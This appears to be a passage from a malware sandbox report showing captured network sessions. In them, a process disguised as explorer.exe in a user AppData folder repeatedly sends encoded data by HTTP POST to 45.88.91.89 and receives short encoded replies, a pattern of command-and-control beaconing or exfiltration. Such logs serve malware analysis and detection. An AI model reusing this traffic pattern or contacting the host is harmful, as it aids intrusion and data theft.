                                                      Dec 13, 2024 14:32:46.719347954 CET | 309 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Dec 13, 2024 14:32:47.063344002 CET | 2568 | OUT | Data Raw: 56 55 5d 5e 56 5b 50 50 5b 5f 52 55 59 5b 57 52 57 52 5f 52 50 5b 56 5d 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: VU]^V[PP[_RUY[WRWR_RP[V]_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[",?+\&-'+<'/?0?7<+^0;9 2X5B$-8_;=$[' \,.
                                                      Dec 13, 2024 14:32:47.806603909 CET | 25 | IN | HTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:32:48.041188002 CET | 200 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:32:47 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      8 | 192.168.2.6 | 49787 | 45.88.91.89 | 80 | 8088 | C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:32:48.351617098 CET | 333 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:32:48.703907013 CET | 2568 | OUT | Data Raw: 56 53 5d 52 53 5e 55 56 5b 5f 52 55 59 50 57 59 57 5a 5f 5a 50 53 56 58 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: VS]RS^UV[_RUYPWYWZ_ZPSVX_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[!]-<['>'W</($0?#^<^&(*"2$.0>0Y,-$[' \,
                                                      Dec 13, 2024 14:32:49.436192036 CET | 25 | IN | HTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:32:49.669106960 CET | 200 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:32:49 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      9 | 192.168.2.6 | 49793 | 45.88.91.89 | 80 | 8088 | C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:32:49.928683043 CET | 333 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:32:50.282066107 CET | 2568 | OUT | Data Raw: 56 5a 58 5e 56 5f 50 55 5b 5f 52 55 59 5f 57 5b 57 5b 5f 52 50 5a 56 58 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: VZX^V_PU[_RUY_W[W[_RPZVX_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[!Z,?7^'3+/<Y$,/3?7?43.4'2>60>[,$[' \,>
                                                      Dec 13, 2024 14:32:51.031677008 CET | 25 | IN | HTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:32:51.278587103 CET | 200 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:32:50 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      10 | 192.168.2.6 | 49795 | 45.88.91.89 | 80 | 8088 | C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:32:51.455820084 CET | 333 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 1456
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:32:51.813321114 CET | 1456 | OUT | Data Raw: 56 57 58 5e 56 5d 50 53 5b 5f 52 55 59 5e 57 5f 57 5c 5f 5c 50 5a 56 5a 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: VWX^V]PS[_RUY^W_W\_\PZVZ_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[!\:<'^0>U(??%?3$;?'3+#4&>%'>0_/$[' \,
                                                      Dec 13, 2024 14:32:52.539679050 CET | 25 | IN | HTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:32:52.777343988 CET | 349 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:32:52 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 39 38 0d 0a 00 1a 27 5b 3f 3a 23 11 26 05 05 0f 30 2d 36 01 3e 06 29 13 2c 2f 3f 01 24 1d 3f 50 3c 30 26 13 3d 0a 28 07 2b 20 2e 02 23 01 3b 0c 39 0c 2f 5f 0d 11 3b 02 37 3d 2d 03 2d 2d 28 00 3d 07 31 59 2b 06 21 5f 2a 10 3c 59 27 2b 08 1e 26 5b 22 13 2b 07 2c 0f 3f 38 3c 5e 3a 02 26 06 32 0f 2f 57 0d 1e 27 55 3f 0c 35 58 23 5e 3c 5e 22 2d 17 10 2a 1d 3e 53 35 07 3b 5d 31 00 3d 5b 27 2c 27 0c 34 0a 20 5c 26 1d 23 1d 27 29 24 0b 26 15 2e 50 2a 00 29 51 0f 32 54 54 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 98'[?:#&0-6>),/?$?P<0&=(+ .#;9/_;7=---(=1Y+!_*<Y'+&["+,?8<^:&2/W'U?5X#^<^"-*>S5;]1=[','4 \&#')$&.P*)Q2TT0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      11 | 192.168.2.6 | 49796 | 45.88.91.89 | 80 | 8088 | C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:32:51.940047979 CET | 333 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2564
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:32:52.297672987 CET | 2564 | OUT | Data Raw: 56 53 5d 5b 56 5d 50 53 5b 5f 52 55 59 59 57 58 57 5c 5f 5b 50 5d 56 53 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: VS][V]PS[_RUYYWXW\_[P]VS_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[!- 0#R>/(X'+$< (3Z'8)X T+%23',$[' \,*
                                                      Dec 13, 2024 14:32:53.025230885 CET | 25 | IN | HTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:32:53.261082888 CET | 200 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:32:52 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      12 | 192.168.2.6 | 49802 | 45.88.91.89 | 80 | 8088 | C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:32:53.512461901 CET | 309 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Dec 13, 2024 14:32:53.860172033 CET | 2568 | OUT | Data Raw: 56 51 5d 5b 56 5c 55 52 5b 5f 52 55 59 58 57 5f 57 5a 5f 59 50 5a 56 5a 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: VQ][V\UR[_RUYXW_WZ_YPZVZ_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX["-<3>T>,8[$3'*7<$: #Z25@%.+;$[' \,"
                                                      Dec 13, 2024 14:32:54.614403963 CET | 25 | IN | HTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:32:54.833034039 CET | 200 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:32:54 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      13 | 192.168.2.6 | 49807 | 45.88.91.89 | 80 | 8088 | C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:32:55.110008001 CET | 333 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:32:55.469564915 CET | 2568 | OUT | Data Raw: 53 51 5d 5c 56 58 50 50 5b 5f 52 55 59 50 57 58 57 5f 5f 5f 50 52 56 5c 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: SQ]\VXPP[_RUYPWXW___PRV\_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[!9'3>#T(<83(V'8('Z&8)Y7231>G3X,X8-$[' \,
                                                      Dec 13, 2024 14:32:56.300745964 CET | 25 | IN | HTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:32:56.533082962 CET | 200 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:32:56 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      14 | 192.168.2.6 | 49813 | 45.88.91.89 | 80 | 8088 | C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:32:56.782488108 CET | 333 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:32:57.141463041 CET | 2568 | OUT | Data Raw: 53 57 58 5b 53 5e 50 55 5b 5f 52 55 59 5b 57 5a 57 5f 5f 5c 50 53 56 53 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: SWX[S^PU[_RUY[WZW__\PSVS_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[!^,/?'X$?Z [$Z4S'?43X&;431@'>0X;=$[' \,.


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      15 | 192.168.2.6 | 49815 | 45.88.91.89 | 80 | 8088 | C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:32:57.904215097 CET | 333 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 1456
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:32:58.250763893 CET | 1456 | OUT | Data Raw: 53 51 58 5c 53 58 50 50 5b 5f 52 55 59 58 57 5e 57 52 5f 5a 50 59 56 5d 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: SQX\SXPP[_RUYXW^WR_ZPYV]_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX["-<4&.'?3$<0' ?'7Z'[##Y%"0>Y/=$[' \,"
                                                      Dec 13, 2024 14:32:58.989263058 CET | 25 | IN | HTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:32:59.229100943 CET | 349 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:32:58 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 39 38 0d 0a 00 1a 27 5a 3f 00 34 0a 25 02 38 12 27 13 07 11 29 59 22 00 2c 2c 3c 5f 26 24 2f 51 2a 33 21 09 3e 37 28 01 2a 1d 3e 00 20 59 3f 0f 2e 36 2f 5f 0d 11 38 13 20 3d 2d 03 3b 5b 27 11 3e 10 25 5e 2b 01 25 5f 3d 00 0d 04 24 15 3a 1c 24 3d 32 56 2b 5f 28 0f 2b 05 3c 17 2e 12 07 5d 25 35 2f 57 0d 1e 27 50 29 32 29 5e 34 38 12 14 22 04 35 59 2a 1a 2e 1d 21 39 27 5b 26 2e 0f 14 31 05 23 0c 34 23 0e 10 31 1d 34 0d 33 29 23 1e 31 05 2e 50 2a 00 29 51 0f 32 54 54 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 98'Z?4%8')Y",,<_&$/Q*3!>7(*> Y?.6/_8 =-;['>%^+%_=$:$=2V+_(+<.]%5/W'P)2)^48"5Y*.!9'[&.1#4#143)#1.P*)Q2TT0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      16 | 192.168.2.6 | 49816 | 45.88.91.89 | 80 | 8088 | C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:32:58.030399084 CET | 333 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:32:58.375778913 CET | 2568 | OUT | Data Raw: 53 51 58 5b 56 5d 55 5f 5b 5f 52 55 59 5b 57 5e 57 58 5f 5c 50 58 56 52 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: SQX[V]U_[_RUY[W^WX_\PXVR_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[!:$=/S(Y3'/(('?[&(& "($-%'/-$[' \,.
                                                      Dec 13, 2024 14:32:59.116645098 CET | 25 | IN | HTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:32:59.351181984 CET | 200 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:32:58 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      17 | 192.168.2.6 | 49822 | 45.88.91.89 | 80 | 8088 | C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:32:59.592679977 CET | 309 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Dec 13, 2024 14:33:00.678548098 CET | 25 | IN | HTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:33:00.917119026 CET | 200 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:33:00 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      18 | 192.168.2.6 | 49828 | 45.88.91.89 | 80 | 8088 | C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:33:01.170731068 CET | 333 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:33:02.315752029 CET | 25 | IN | HTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:33:02.564076900 CET | 200 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:33:02 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      19 | 192.168.2.6 | 49830 | 45.88.91.89 | 80 | 8088 | C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:33:03.124161959 CET | 333 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:33:04.210403919 CET | 25 | IN | HTTP/1.1 100 Continue


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      20 | 192.168.2.6 | 49836 | 45.88.91.89 | 80 | 8088 | C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:33:04.356209993 CET | 333 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 1456
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:33:05.441090107 CET | 25 | IN | HTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:33:05.677130938 CET | 349 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:33:05 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      21 | 192.168.2.6 | 49837 | 45.88.91.89 | 80 | 8088 | C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:33:04.477627993 CET | 333 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:33:05.563888073 CET | 25 | IN | HTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:33:05.797722101 CET | 200 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:33:05 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      22 | 192.168.2.6 | 49843 | 45.88.91.89 | 80 | 8088 | C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      Timestamp | Bytes transferred | Direction | Data
